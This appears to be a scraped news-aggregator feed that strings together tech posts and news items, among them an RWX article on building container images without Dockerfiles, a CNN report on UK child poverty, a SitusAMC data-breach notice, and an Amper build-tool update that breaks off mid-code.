Quora stuff: 21 votes by Ian Wong, Joseph Reisinger, William Morgan, Marc Bodnick, Cameron Ellis, Kartik Ayyar, Can Duruk, Brandon Smietana, Ronen Amit, Amit Chaudhary, Dare Obasanjo, Joseph Quattrocchi, Siqi Chen, Tim Converse, Zoltan Varju, Sundeep Yedida, Elliot Turner, Nenshad Bardoliwalla, Mike Mintz, Abhimanyu Gupta, and Nick Kaluzhenkoff

We deleted our Dockerfiles: a better, faster way to build container images

Lobsters
www.rwx.com
2025-11-24 18:23:11
Comments...
Original Article

Earlier this year, we shared some reflections on the limitations of Dockerfiles and BuildKit (Docker’s internal build engine). We talked to hundreds of teams about their CI/CD pipelines over the last 6 months and consistently see that docker build is slowing teams down.

We considered the problems and wondered if the strategies we used to build the fastest CI/CD platform could be leveraged to build container images as well. So we gave it a try - converting our Dockerfiles to RWX run definitions and seeing if we could extract container images natively from our own product.

And it worked! Two weeks ago, we deleted the Dockerfile for our application, and we deleted the step in our CI pipelines that previously ran docker build:

commit acae90a991fb4b2ecdfcf5c754ebe7169af57c33

Date: Fri Nov 7 18:28:36 2025 -0500

Remove the Dockerfile (#6330)

M .rwx/build-image-rwx.yml

Our container image builds got faster and the configuration became simpler.

In this post, we’re excited to share how we build container images, why it’s faster than building with Dockerfiles and BuildKit, how it has improved our developer experience, and how you can start deleting your Dockerfiles too.

How we build container images on RWX

RWX is a CI/CD platform built around the idea of executing builds as a graph of cacheable tasks . Each step in a build pipeline is represented by a task that runs atomically, rather than a series of stateful steps running as a single job tied to a single VM.

We save the filesystem changes from every task to use as input into subsequent tasks. This technique enabled us to package up those filesystem changes as layers in a container image.

In effect, we were already producing container images from every single task in an RWX run definition. And it was exceptionally fast. The thought of building a container image for every single step in a CI pipeline may sound like it’d be far too slow, but we’ve optimized it to happen very quickly.

Now, a Dockerfile implemented something like this:

Dockerfile

FROM node:24.11.0-trixie-slim

COPY package.json package-lock.json ./

CMD ["node", "server.js"]

Can be converted to an RWX definition that looks like this:

.rwx/image.yml

image: node:24.11.0-trixie-slim

repository: https://github.com/rwx-cloud/rwx-image-example.git

ref: ${{ init.commit-sha }}

echo "node" | tee $RWX_IMAGE/user

echo "node server.js" | tee $RWX_IMAGE/command

Docker pull

To prove this out, we implemented endpoints in our Cloud backend that correspond to the distribution registry endpoints. This enabled us to pull container images directly from our Cloud backend, for any step in an entire CI pipeline.

Although you can pull directly via docker pull, we shipped an rwx image pull command in the CLI to make it even easier.
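For reference, the distribution registry pull flow that any compatible backend has to speak boils down to two kinds of HTTP requests: fetch a manifest by tag, then fetch each layer blob by digest. The sketch below uses an invented registry host and repository name and omits authentication.

```python
# Minimal sketch of a registry pull against the Docker/OCI distribution API.
# Host, repository, and tag are placeholders; auth handling is omitted.
import requests

REGISTRY = "https://registry.example.com"
REPO = "myteam/myapp"
TAG = "latest"

manifest = requests.get(
    f"{REGISTRY}/v2/{REPO}/manifests/{TAG}",
    headers={"Accept": "application/vnd.oci.image.manifest.v1+json"},
).json()

for layer in manifest.get("layers", []):
    digest = layer["digest"]
    blob = requests.get(f"{REGISTRY}/v2/{REPO}/blobs/{digest}")
    print(digest, len(blob.content), "bytes")
```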

Why it’s faster than using BuildKit

Distributed, right-sized compute

Docker builds run on a single machine, one step after another. Even when you use multi-stage builds, each stage competes for the same CPU, memory, disk, and network. And if you need to build multiple variants (different architectures, library versions, etc.) you typically end up running the whole build repeatedly.

RWX takes a different approach. By default, tasks in an RWX run definition (which correspond to individual steps in a Dockerfile) are distributed across multiple machines.

This way, each task can have its own right-sized compute: a task that needs 16 CPUs can claim it, while the next task can run on a smaller machine.

By running on distributed compute by default, we can avoid having an under-provisioned build machine, which inherently can end up being over-utilized or queueing builds.

.rwx/example.yml

run: apt-get update && apt-get install -y build-essential && apt-get clean

filter: [Gemfile, Gemfile.lock]

run: bundle exec rails assets:precompile

Cache is king

With a Dockerfile, once you change any layer, you force a rebuild of every layer thereafter. Straight from the Docker documentation:

And that's the Docker build cache in a nutshell. Once a layer changes, then all downstream layers need to be rebuilt as well. Even if they wouldn't build anything differently, they still need to re-run.

RWX container builds use content-based caching with filtering , which enables having a cache hit even after a cache miss.

Rather than having to carefully order the COPY statements in a Dockerfile to maintain caching, we can instead copy our whole repository into the image, and then filter subsequent command executions.

Here is a common example of a Dockerfile that would have suboptimal caching:

Dockerfile

RUN apt-get update && apt-get install -y build-essential nodejs && apt-get clean

# copy the Gemfiles first for caching

COPY Gemfile Gemfile.lock .

# unfortunately, this will cache miss if bundle install is a cache miss

COPY package.json package-lock.json .

RUN bundle exec rails assets:precompile

And here is the same image definition converted to RWX, which will always cache as optimally as possible.

.rwx/example.yml

run: apt-get update && apt-get install -y build-essential nodejs && apt-get clean

filter: [Gemfile, Gemfile.lock]

filter: [package.json, package-lock.json]

use: [code, node-modules]

use: [code, bundle, npm-build]

run: bundle exec rails assets:precompile

The cache key on RWX is determined by the command and the contents of the source files. Importantly, any files not specified in the filter will not be present on disk. This sandboxing approach ensures that cache hits will never be a false positive.
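Conceptually, a content-based cache key of this kind can be computed by hashing the command together with the contents of exactly the files named in the filter. The following is a simplified sketch of that idea, not RWX's actual implementation.

```python
# Simplified sketch of a content-based cache key: hash the command plus the
# bytes of only the filtered files. Files outside the filter cannot affect the
# key, which is what makes a cache hit after an earlier miss possible.
import hashlib

def cache_key(command: str, filtered_files: list[str]) -> str:
    h = hashlib.sha256()
    h.update(command.encode())
    for path in sorted(filtered_files):  # stable ordering
        h.update(path.encode())
        with open(path, "rb") as f:
            h.update(f.read())
    return h.hexdigest()

# Example: a bundle-install task only re-runs if the Gemfiles change.
print(cache_key("bundle install", ["Gemfile", "Gemfile.lock"]))
```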

Automatic caching from full repository

We also just don’t need to agonize over properly configuring additional cache-control levers like --cache-from and --cache-to. We frequently work directly with engineering organizations of all sizes to help them optimize their CI, and a shocking percentage of the companies we’ve worked with either have their Docker cache misconfigured or haven’t configured one at all.

Many pipelines will also do things like pull images before building, which can help a little bit, but in the case where there is a legitimate cache miss, it’s a waste of time to pull an image that ultimately will not be used.

RWX resolves cache hits seamlessly and automatically in real time from the contents of the entire container repository; no configuration required.

Network is fast, compression is slow

Docker compresses every layer before it is uploaded and decompresses every layer when it is downloaded. This was a great decision in 2013.

But in 2025, cloud networks are substantially faster than compression algorithms. It’s faster to upload 1 gigabyte of data than it is to gzip 1 gigabyte of data.

Compression is also a bad tradeoff because storage is cheap and compute is expensive.

In RWX, we transmit and store all of our layers and cache uncompressed.
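
If you want to sanity-check that tradeoff on your own hardware, a rough benchmark like the sketch below is enough: time gzip over a buffer and compare its throughput with the bandwidth you actually see to your registry. The 1 Gbit/s figure and the random payload are assumptions; real layers compress better than random bytes, but compression throughput is the number that matters here.

```python
import gzip
import os
import time

payload = os.urandom(256 * 1024 * 1024)      # 256 MiB of random (hard-to-compress) bytes

start = time.perf_counter()
compressed = gzip.compress(payload, compresslevel=6)
elapsed = time.perf_counter() - start

gzip_mb_per_s = len(payload) / elapsed / 1e6
assumed_network_mb_per_s = 125.0             # assumption: 1 Gbit/s link ≈ 125 MB/s

print(f"gzip throughput : {gzip_mb_per_s:7.1f} MB/s")
print(f"assumed network : {assumed_network_mb_per_s:7.1f} MB/s")
print(f"compressed size : {len(compressed) / 1e6:7.1f} MB")
```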

Why we love our new developer experience

Context matters

With traditional Dockerfiles, the entire project has to be sent to the builder as a build context . For engineering teams with very large code repositories, this can be very slow.

This means that even when leveraging faster remote build machines, a fair amount of time can be spent uploading the repository.

Instead of pushing contents, it’s much faster to use git clone on the build machine to pull the code into the image.

While the git clone approach could be done with BuildKit, it’s not viable because of the caching mechanics. Individual files need to be added with a COPY before the entire repo is put into the image. Otherwise, the entire build will cache miss. Since filtering on RWX alleviates this concern, you can improve performance by cloning straight into the image rather than pushing build context.

First-class observability

Successful steps in a Docker build don’t output logs to the CLI by default, so interesting logs for a run command that indicate the cause of downstream problems are easily missed.

In RWX, the full logs for every task are preserved and easily accessible regardless of success or failure. We can leave ourselves rich annotations in our logs to understand what’s happening.

And every step in our build comes with its own diagnostics and explorable filesystem .

Faster container builds on GitHub Actions

Although we recommend running all of your CI on RWX, you can build container images on RWX directly from GitHub Actions by using the rwx-cloud/build-push-action .

.github/workflows/rwx.yml

```yaml
name: Build on RWX and Push to Docker Hub

on: push

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6

      - name: Login to Docker Hub
        uses: docker/login-action@v3
        with:
          username: ${{ secrets.DOCKER_USERNAME }}
          password: ${{ secrets.DOCKER_PASSWORD }}

      - uses: rwx-cloud/build-push-action@v1
        with:
          access-token: ${{ secrets.RWX_ACCESS_TOKEN }}
          push-to: docker.io/myusername/myapp:latest
```

What’s next?

Deleting our Dockerfile may have started as an experiment, but we’ve become convinced that RWX is now the best way to build container images.

We get the benefits of producing container images without slowing down our CI and CD waiting for them to build. Ultimately, we ship faster while still generating reproducible and portable build artifacts.

You can experiment with building your own container images on RWX today.

And we’d love to talk more with you!

  • We’ll be at AWS re:Invent Booth 1958 from December 1-5. If you’re around, please stop by!
  • Say hello in the RWX Discord
  • Email co-founder Dan Manges at [email protected]


Dirk Eddelbuettel: RcppQuantuccia 0.1.3 on CRAN: Micro Maintenance

PlanetDebian
dirk.eddelbuettel.com
2025-11-24 18:22:00
A minor release of RcppQuantuccia arrived on CRAN moments ago. RcppQuantuccia started from the Quantuccia header-only subset / variant of QuantLib which it brings it to R. This project validated the idea of making the calendaring functionality of QuantLib available in a more compact and standalone p...
Original Article

RcppQuantuccia 0.1.3 on CRAN: Micro Maintenance

A minor release of RcppQuantuccia arrived on CRAN moments ago. RcppQuantuccia started from the Quantuccia header-only subset / variant of QuantLib, which it brings to R. This project validated the idea of making the calendaring functionality of QuantLib available in a more compact and standalone project – which we now do with qlcal, which can be seen as a successor package to this earlier package. qlcal tracks QuantLib (releases) closely and provides approximately quarterly updates. Switching to using qlcal is generally recommended.

This release, the first in almost exactly two years, only updates internals (as detailed below). Notably, it switches to ‘Authors@R’ to avoid a nag from CRAN on two platforms. The complete list of changes for this release follows.

Changes in version 0.1.3 (2025-11-24)

  • A badge URL and link have been updated in README.md

  • The continuous integration script switched first to r-ci-setup and then to the r-ci action with embedded setup

  • The DESCRIPTION file now uses Authors@R

Courtesy of CRANberries, there is also a diffstat report relative to the previous release. More information is on the RcppQuantuccia page. Issues and bug reports should go to the GitHub issue tracker.

If you like this or other open-source work I do, you can now sponsor me at GitHub .

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

/code/rcpp | permanent link

Show HN: I built an interactive HN Simulator

Hacker News
news.ysimulator.run
2025-11-24 17:52:43
Comments...

Cool-retro-term: terminal emulator which mimics look and feel of the old CRTs

Hacker News
github.com
2025-11-24 17:52:01
Comments...
Original Article

cool-retro-term

[Animated screenshots: Default Amber, IBM DOS, and Default Green themes of Cool Retro Term]

Description

cool-retro-term is a terminal emulator which mimics the look and feel of the old cathode tube screens. It has been designed to be eye-candy, customizable, and reasonably lightweight.

It uses the QML port of qtermwidget (Konsole): https://github.com/Swordfish90/qmltermwidget .

This terminal emulator works under Linux and macOS and requires Qt5. It's suggested that you stick to the latest LTS version.

Settings such as colors, fonts, and effects can be accessed via context menu.

Screenshots


Install

If you want to get a hold of the latest version, just go to the Releases page and grab the latest AppImage (Linux) or dmg (macOS).

Alternatively, most distributions such as Ubuntu, Fedora or Arch already package cool-retro-term in their official repositories.

Building

Check out the wiki and follow the instructions on how to build it on Linux and macOS .

Andrej Karpathy on X: implications of AI to schools

Hacker News
twitter.com
2025-11-24 17:51:02
Comments...

Real-estate finance services giant SitusAMC breach exposes client data

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 17:36:28
SitusAMC, a company that provides back-end services for top banks and lenders, disclosed on Saturday a data breach it had discovered earlier this month that impacted customer data. [...]...
Original Article

Real-estate finance services giant SitusAMC breach exposes client data

SitusAMC, a company that provides back-end services for top banks and lenders, disclosed on Saturday a data breach it had discovered earlier this month that impacted customer data.

As a real-estate (commercial and residential) financing firm, SitusAMC handles back-office operations in areas like mortgage origination, servicing, and compliance for banks and investors.

The company generates around $1 billion in annual revenue from 1,500 clients, some of whom are banking giants like Citi, Morgan Stanley, and JPMorgan Chase.


While investigations with the help of external experts are ongoing, the company underlined that business operations haven't been affected and no encrypting malware was deployed on its systems.

SitusAMC stated that data from some of its clients, as well as their customers' data, were compromised as a result of the breach, though it didn't name any companies.

"On November 12, 2025, SitusAMC became aware of an incident that we have now determined resulted in certain information from our systems being compromised," reads the statement .

"Corporate data associated with certain of our clients' relationship with SitusAMC such as accounting records and legal agreements has been impacted. Certain data relating to some of our clients' customers may also have been impacted." SitusAMC promised to provide further updates as the investigation progresses.

In a statement to BleepingComputer, the company CEO said that SitusAMC is fully operational and clients are contacted directly about the incident.

"We are in direct contact with our clients about this matter. We remain focused on analyzing any potentially affected data and will provide updates directly to our clients as our investigation progresses" - Michael Franco, SitusAMC CEO

While SitusAMC received a security alert related to the incident on November 12, the company determined three days later that it was a breach and started to inform its residential customers on November 16 that it was investigating the attack.

The company continued to deliver updates to these customers and contacted those impacted by the breach individually up to November 22, when it notified all its clients and confirmed that data was stolen in the attack.

Due to the complexity of operations and data involved, it is unclear how many customers are impacted, and determining all of them will take a while.

BleepingComputer has contacted Citi, Morgan Stanley, and JPMorgan Chase to ask if SitusAMC notified them of a data breach and if their clients' data was compromised. A comment was not immediately available from any of the organizations.

If you have any information regarding this incident or any other undisclosed attacks, you can contact us confidentially via Signal at 646-961-3731 or at tips@bleepingcomputer.com .


Ask HN: Scheduling stateful nodes when MMAP makes memory accounting a lie

Hacker News
news.ycombinator.com
2025-11-24 17:30:40
Comments...
Original Article

We’re hitting a classic distributed systems wall and I’m looking for war stories or "least worst" practices.

The Context: We maintain a distributed stateful engine (think search/analytics). The architecture is standard: a Control Plane (Coordinator) assigns data segments to Worker Nodes. The workload involves heavy use of mmap and lazy loading for large datasets.

The Incident: We had a cascading failure where the Coordinator got stuck in a loop, DDOS-ing a specific node.

The Signal: Coordinator sees Node A has significantly fewer rows (logical count) than the cluster average. It flags Node A as "underutilized."

The Action: Coordinator attempts to rebalance/load new segments onto Node A.

The Reality: Node A is actually sitting at 197GB RAM usage (near OOM). The data on it happens to be extremely wide (fat rows, huge blobs), so its logical row count is low, but physical footprint is massive.

The Loop: Node A rejects the load (or times out). The Coordinator ignores the backpressure, sees the low row count again, and retries immediately.

The Core Problem: We are trying to write a "God Equation" for our load balancer. We started with row_count, which failed. We looked at disk usage, but that doesn't correlate with RAM because of lazy loading.

Now we are staring at mmap. Because the OS manages the page cache, the application-level RSS is noisy and doesn't strictly reflect "required" memory vs "reclaimable" cache.

The Question: Attempting to enumerate every resource variable (CPU, IOPS, RSS, Disk, logical count) into a single scoring function feels like an NP-hard trap.

How do you handle placement in systems where memory usage is opaque/dynamic?

Dumb Coordinator, Smart Nodes: Should we just let the Coordinator blind-fire based on disk space, and rely 100% on the Node to return hard 429 Too Many Requests based on local pressure?

Cost Estimation: Do we try to build a synthetic "cost model" per segment (e.g., predicted memory footprint) and schedule based on credits, ignoring actual OS metrics?

Control Plane Decoupling: Separate storage balancing (disk) from query balancing (mem)?

Feels like we are reinventing the wheel. References to papers or similar architecture post-mortems appreciated.
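
If we went the "Dumb Coordinator, Smart Nodes" route, the node-side check could be as simple as the sketch below (Linux assumed; the port and threshold are placeholders). MemAvailable in /proc/meminfo already discounts reclaimable page cache, unlike RSS, which is part of why local admission feels more honest than anything the coordinator can compute remotely.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

MIN_AVAILABLE_BYTES = 16 * 1024**3           # placeholder: refuse new segments below 16 GiB headroom

def mem_available_bytes() -> int:
    """MemAvailable accounts for reclaimable page cache, unlike RSS."""
    with open("/proc/meminfo") as f:
        for line in f:
            if line.startswith("MemAvailable:"):
                return int(line.split()[1]) * 1024   # reported in kB
    raise RuntimeError("MemAvailable not found")

class Admission(BaseHTTPRequestHandler):
    def do_POST(self):
        if mem_available_bytes() < MIN_AVAILABLE_BYTES:
            self.send_response(429)          # hard backpressure to the coordinator
            self.send_header("Retry-After", "30")
            self.end_headers()
            return
        self.send_response(202)              # accept the segment assignment
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), Admission).serve_forever()
```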

Corvus Robotics (YC S18): Hiring Head of Mfg/Ops, Next Door to YC Mountain View

Hacker News
news.ycombinator.com
2025-11-24 17:00:33
Comments...
Original Article

Corvus Robotics is scaling the largest autonomous logistics data capture fleet ever built. If you're allergic to leaded solder, actual revenue, spreadsheets, or ambiguity -- this role is not for you. More "cardboard boxes," less "Pelican cases."

Our fleet of flying warehouse drones is 5x-ing in 2026, and I'm looking for a generalist ex-founder or manufacturing leader in the SF Bay Area who wants to get their hands dirty massively scaling manufacturing operations in the US and overseas.

We need someone who has worked on hardware products (not just SaaS), communicates clearly, and is relentlessly resourceful. Mandarin proficiency and leading a product through EVT/DVT/PVT is an added bonus.

If this resonates with you, DM me, or send a super short email to a@ our url with: - why you’re interested - what was the biggest manufacturing fuckup you've recovered from - your target comp

PS - Please reshare our LinkedIn post! https://www.linkedin.com/posts/mhkabirr_at-corvus-robotics-w...

Thanks, Jackie

France threatens GrapheneOS with arrests / server seizure for refusing backdoors

Hacker News
mamot.fr
2025-11-24 17:00:07
Comments...

Britain is one of the richest countries. So why do children live in poverty?

Hacker News
www.cnn.com
2025-11-24 16:53:11
Comments...
Original Article

London

Thea Jaffe never expected to use a baby bank . In fact, she was responsible for referring other single parents from her local community group to the charity Little Village , which provides essential supplies for new parents who otherwise wouldn’t be able to afford them – everything from strollers and cots to clothes, diapers, toys and books.

But when Jaffe, who lives in London , became pregnant unexpectedly with her second child, she couldn’t afford to buy everything she needed. “It’s so overwhelming having to accommodate a baby with no budget,” she told CNN.

“I was already struggling financially… but I didn’t know how bad things were going to get… Now things are at a point where I’m working full time, and I cannot pay my bills.”

A Little Village baby bank in Wembley, North London is filled with items new parents might need.

Child poverty has reached a record high in the United Kingdom as the country’s cost of living soars and its social security safety net falters following years of government austerity. With public services much weakened, charities like Little Village have stepped in.

The issue is firmly under the spotlight this week as campaign groups call on Britain’s Labour government to prioritize measures to reduce child poverty in its annual budget, which will be unveiled on Wednesday.

Around one-third of Britain’s children – about 4.5 million – now live in relative poverty, often measured as living in a household that earns below 60% of the national median income after housing costs, a government report published in April found.

One million of these children are destitute, with their most basic needs of staying warm, dry, clothed and fed going unmet, according to a 2023 study by the Joseph Rowntree Foundation, which studies poverty and formulates policy to tackle it.

“We came across one family that were just existing on cornflakes and rice,” Little Village chief executive Sophie Livingstone told CNN.

“We have lots of families who are in one room, lots of mold, lots of very poor-quality housing even when people are housed,” she added.

Even for families that are able to meet their children’s basic needs, life is a month-to-month struggle, without any financial security.

“You just live in fear all the time and that’s not a fun place to be when you’ve got children relying on you,” Lia, a single mother to 7-year-old twin girls, told CNN after being connected through the Changing Realities Project, which documents parents living on low incomes. She asked to use a pseudonym to protect her family’s privacy.

“They want to do all the same things that their peers are doing… but the budget won’t allow that,” she said. After paying for essentials each month, she has no money left.

“Every single time I go out, I have to vigilantly and diligently make sure I’m not overspending. That’s a really anxiety-provoking situation to be in.”

A law graduate who lives in Hampshire, southeast England, Lia initially returned to work but says she would often be called mid-meeting by her childcare provider if one of her daughters, who has complex needs, dyspraxia and global developmental delay, was having a “tantrum or a meltdown.” She eventually had to quit her job.

“I go into survival mode,” she said. “I was in the (foster) care system growing up and I remember feeling so much struggle and angst like, ‘if I can just get through this, it’ll be ok.’ Yet still, that situation hasn’t changed; as much as I know I have a lot to offer and I try to be a good member of society, I still feel like no matter where I turn, there’s difficulty.”

And even for families earning well above the poverty line, the cost of housing and childcare, especially in London, can be so high that there is simply no money to spend on anything else. Around 70% of children living in poverty have at least one parent in work.

Thea Jaffe is pictured at a Little Village baby bank with the youngest of her three children.

Childcare is more expensive in the UK than in most other wealthy countries – costing about 25% of a couple’s and about 60% of a single parent’s net household income, according to figures released by think tank The Institute for Fiscal Studies in 2022.

Jaffe, the mother who makes use of the Little Village baby bank, works full-time in client solutions and says she earns £45,000 ($59,000) a year to support herself and her three children – well above the UK’s average. Still, she says she is “struggling every month to make sure everything is paid, not able to save anything, not able to do things for my kids.”

After paying for essentials – rent, childcare, food and household bills – she is left with £192 (around $250) a month for emergencies and to save for the next month in case there’s an error in her next social security payment – something she says is a regular occurrence.

Although child poverty has always been present in the UK, the rate of it is rising – and much faster than in other wealthy countries. Between 2012 and 2021, it rose by almost 20%, UNICEF found. Now, in 2025, the UK’s child poverty rate is higher than that of any European Union country except Greece, according to the Resolution Foundation , a living standards think tank.

The organization estimates that another 300,000 children will fall into poverty by 2030 if nothing changes.

The current poverty rate reflects inequalities present elsewhere in society, too. Almost half of children in Black and Asian communities are living in poverty, compared with 24% of White children, while children living in single-parent families or in families where someone is disabled are also more likely to live in poverty, figures from campaign organization the Child Poverty Action Group show.

Part of this rise is down to the same economic conditions afflicting other parts of the Western world – sluggish growth, and employment no longer offering the same financial security, as well as stubborn inflation that disproportionately affects essential goods and, therefore, people on low incomes.

Renata Acioli (center), who manages Little Village's baby bank in Wembley, is pictured with fellow staff members Sharna Singh (left) and Yosr Bahr (right).

But academics and advocates say policy decisions have also played a part. Britain’s public services were slashed by the center-right Conservative-led coalition and subsequent Conservative government in power from 2010 to 2024.

And as part of its austerity program, which aimed to reduce public spending in the wake of the 2008 financial crisis, the Conservatives introduced three policies that “are very largely responsible for the increase in child poverty today,” said Jonathan Bradshaw, an emeritus professor of social policy at the University of York who also served as one of the academic advisers to the current government’s upcoming child poverty strategy.

These limited the amount of welfare people are eligible to claim – one is an overall cap on the benefits a household can receive, another limits housing benefits and the third is a two-child benefit cap, meaning that parents cannot claim anything for their third or subsequent children born after 2017.

Charities and academics say it is this two-child benefit cap in particular that is largely responsible for Britain’s rising rates of child poverty.

“Most of the increase in child poverty has occurred in large families,” Bradshaw told CNN.

Britain's former finance minister, George Osborne, was one of austerity's key architects.

All this demonstrates the “inadequacy of the benefits system,” says Peter Matejic, chief analyst at the Joseph Rowntree Foundation.

“If you tot up how much you need for food, energy, all these things, and look at how much (benefits are)… it’s below that level,” he told CNN.

When UN envoys Philip Alston and Olivier De Schutter visited the UK in 2018 and 2023, respectively, they both condemned the poverty they saw there, though De Schutter noted that the country conformed to a pattern of increasing inequality seen in other wealthy countries.

A spokesperson for the current Labour government, which has been in power since July last year, told CNN that “every child, no matter their background, deserves the best start in life.”

“We are investing £500 million in children’s development through the rollout of Best Start Family Hubs, extending free school meals and ensuring the poorest don’t go hungry in the holidays through a new £1 billion crisis support package.”

Addressing child poverty has been a stated priority for the center-left government and, at the same time, an issue that illuminates the fault lines within it.

Ever since Labour came to power, it has grappled with balancing the mandate for change on which it was elected, and its traditional inclination to invest in public services, with scant available funds and a manifesto pledge not to increase taxes on working people.

Its plans to reduce child poverty have thus far been stymied by this conundrum. More details of the government’s spending and tax plans are due to be unveiled Wednesday, in which Chancellor Rachel Reeves, the UK’s finance minister, is expected to address the two-child benefit cap, a policy the government has oscillated between keeping and scrapping for the past year.

But for parents already on the breadline, their household budgets have been stretched too thin, for too long.

“People have got no resilience left,” says Livingstone, remembering that when she first began her role as the head of Little Village “we were talking about the safety net having lots of holes in it.”

“I’m actually not sure that there is much of a safety net anymore,” she says.

A New Raspberry Pi Imager

Hacker News
www.raspberrypi.com
2025-11-24 16:52:21
Comments...

On Modelling Agent Systems with Erlang (2004)

Lobsters
erlang.org
2025-11-24 16:48:36
Comments...
Original Article
No preview for link for known binary extension (.pdf), Link: https://erlang.org/workshop/2004/carlosvarela.pdf.

France threatens GrapheneOS with arrests / server seizure for refusing backdoors

Hacker News
grapheneos.social
2025-11-24 16:40:22
Comments...
Original Article

You are leaving grapheneos.social.

If you trust this link, click it to continue.

https://goingdark.social/@watchfulcitizen/115605398411708768

Misunderstanding that “Dependency” comic

Lobsters
bertptrs.nl
2025-11-24 16:17:35
Comments...
Original Article

Over the course of 2025, every single major cloud provider has failed. In June, Google Cloud had issues taking down Cloud Storage for many users. In late October, Amazon Web Services had a massive outage in their main hub, us-east-1 , affecting many services as well as some people’s beds . A little over a week later Microsoft Azure had a widespread outage that managed to significantly disrupt train service in the Netherlands , and probably also things that matter. Now last week, Cloudflare takes down large swaths of the internet in a way that causes non-tech people to learn Cloudflare exists. And every single time, people share that one XKCD comic.


XKCD 2347: Dependency . Original caption: “Someday ImageMagick will finally break for good and we’ll have a long period of scrambling as we try to reassemble civilization from the rubble.”

Except the random person in Nebraska has been replaced by AWS, Google Cloud, or whoever caused the outage this week. And that kind of bothers me, because it misses the point entirely.

Cloud providers aren’t small indie companies

The original comic is a joke and expression of concern at the fact that lots of our modern technology depends on small projects that largely are maintained by a single driven developer writing code in their spare time. They are important, yet fragile. This is not comparable to the outages we’ve seen this year.

To contrast, these four cloud providers are, for better or worse, important to the web as we know it. But they’re not small. We should recognize that these are huge players, with revenues larger than the GDP of many countries. 1 Cloudflare isn’t anywhere near as big as the other three, but it still has a proportionally gigantic impact on the web due to how much data flows through them.

In addition to how important they are, they are all also among the largest and most valuable companies in the world. It’s concerning how reliant we are on just this handful of players, and when governments become more reliant on them , that is a huge risk. It is however the same, boring risk of influence and dependence it always is with large companies, rather than a risk of single individuals disappearing and taking our technology with them.

Support your guy in Nebraska

There are many people who are effectively a one-man show supporting most of modern technology in their spare time without compensation, and those deserve our support as a society, or at the very least recognition. I’ve tried to highlight a few here.

  • The comic waves at ImageMagick, which was created by John Cristy while working at DuPont. This is really the only fact I can find about it. Every article delving into the history of ImageMagick mentions this and nothing else. I don’t know much about John Cristy, so I can’t comment on him. However, ImageMagick is currently maintained by Dirk Lemstra , who lives in the Netherlands. He does appear to do this all in his spare time.

  • Finnish developer Lasse Collin is the main force behind the XZ compression library . Unfortunately, he is more famous for the social engineering attack on him than he is for his work. Regardless, XZ is an essential piece of software for many ecosystems that require high compression rate regardless of CPU cost. It has been the Arch Linux package compression algorithm of choice for years until it was replaced with zstd .

  • cURL developer and AI slop victim Daniel Stenberg has surprisingly beaten the odds and made a career out of maintaining his open source project, but that doesn’t make him less admirable. Did I recommend his blog enough yet? He lives in Stockholm, Sweden.

  • The late Bram Moolenaar is known for two things: the VIM text editor, and his support for orphaned children in Uganda. The latter of the two has long been the first message you see when opening the former. He lived in Lisse, the Netherlands, and the editor he created continues to be one of the most important tools on the belt of system administrators everywhere.

This is not meant to be an exhaustive list, though if I’ve overlooked someone significant (perhaps actually in Nebraska?) then don’t take that as me disregarding their contributions. There are many more, but the very nature of who they are prevents listing them all. I might update this list for a while, so do get in touch. 2

What next?

Relevant XKCD comics are nothing new to the field. When I was still in university I was educated 3 by my friends on the ones that apply most often. I have since become part of the problem and have been making references to it with others. In a way it’s a rite of passage for a certain kind of geek. So here I am trying to educate the next generation on what things mean.

On the bright side: some people on Reddit do appear to “get it” and point out the sheer ridiculousness of implying the cloud providers are tiny unassuming parts. Others have instead taken the joke and ran with it, off of a cliff , to the point where it no longer makes sense. By the time I finish writing this, it’s probably already old and not funny any more. Nature is healing, I suppose.


Amper Update, November 2025 – Extensibility Preview

Lobsters
blog.jetbrains.com
2025-11-24 16:08:27
Comments...
Original Article

Amper Update, November 2025 – Extensibility Preview

Amper 0.9.0 is out, and it brings the first version of our extensibility prototype! Read on for all of the details, and see the release notes for the full list of changes and bug fixes.

To get support for Amper’s latest features, use IntelliJ IDEA 2025.3 Beta (or newer).

New Amper website

We revamped our documentation and turned it into a brand new website! You no longer have to read Markdown files on GitHub. We hope you’ll enjoy the new structure, as well as the navigation and search functionality.

Check it out at https://amper.org .

Extensibility preview

It’s finally here: our first preview of Amper’s extensibility!

Our philosophy is to give a “batteries included” experience to our users, and this is why we want Amper to cover the most common use cases out of the box. However, a lot of projects have special needs, and the built-in behavior falls short eventually. To address this, Amper now offers the option to write custom tasks and expose them to your modules via plugins.

Note: Only local plugins are supported at the moment, but we will soon add the ability to publish and share plugins.

In Amper 0.9.0, you can create modules with the new jvm/amper-plugin product type. These modules contain the Kotlin code implementing your custom tasks, and a plugin.yaml file to register your tasks and their inputs and outputs.

Why do you need to use both Kotlin and YAML? As usual with Amper, tooling is paramount. Thanks to this approach, you will get nice diagnostics in case you make mistakes with your task wiring. Don’t worry, though, navigating between YAML and Kotlin is already seamless with the current basic IDE support.

Task dependencies are automatically inferred based on inputs and outputs, and task avoidance is already available by default. Inputs can be simple scalar values or files, or even your module’s compile or runtime classpath – thanks to the built-in Classpath type. Outputs can be regular files, but they can also be registered as generated sources or resources so the rest of the build takes them into account.

Build your own plugin from scratch by following our plugin quick-start guide , and tell us what you think in our Slack channel or in a YouTrack issue .

Please bear in mind that this preview is incomplete, and many more features will come in the future, including:

  • The ability to publish plugins and share them with other projects.
  • Templates that are bundled with your plugin to add configuration to the consumer module.
  • Reduced boilerplate when writing tasks that are only used in a single module.
  • Services and libraries for common task-authoring needs.
  • More IDE quick-fixes and intention actions.

Learn more about the current and future state in our plugin documentation .

Dependency resolution performance improvements

The dependency resolution phase was previously a performance bottleneck, especially during IDE import and sync.

Even though all downloaded files are locally cached and reused, building the dependency graph itself takes time, as Amper needs to read all the local pom.xml and Gradle metadata files. Amper now caches the dependency graph itself and reuses it when your dependencies haven’t changed, which can sometimes save tens of seconds on hot caches!
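
The general shape of that optimization, sketched very loosely below (this is not Amper's actual code), is to fingerprint every file that can influence resolution and reuse a serialized graph for as long as that fingerprint is unchanged. The cache path and manifest names are placeholders.

```python
import hashlib
import pickle
from pathlib import Path

CACHE = Path(".cache/dependency-graph.bin")  # placeholder location

def manifests_fingerprint(root: Path) -> str:
    """Hash every file that can affect dependency resolution."""
    h = hashlib.sha256()
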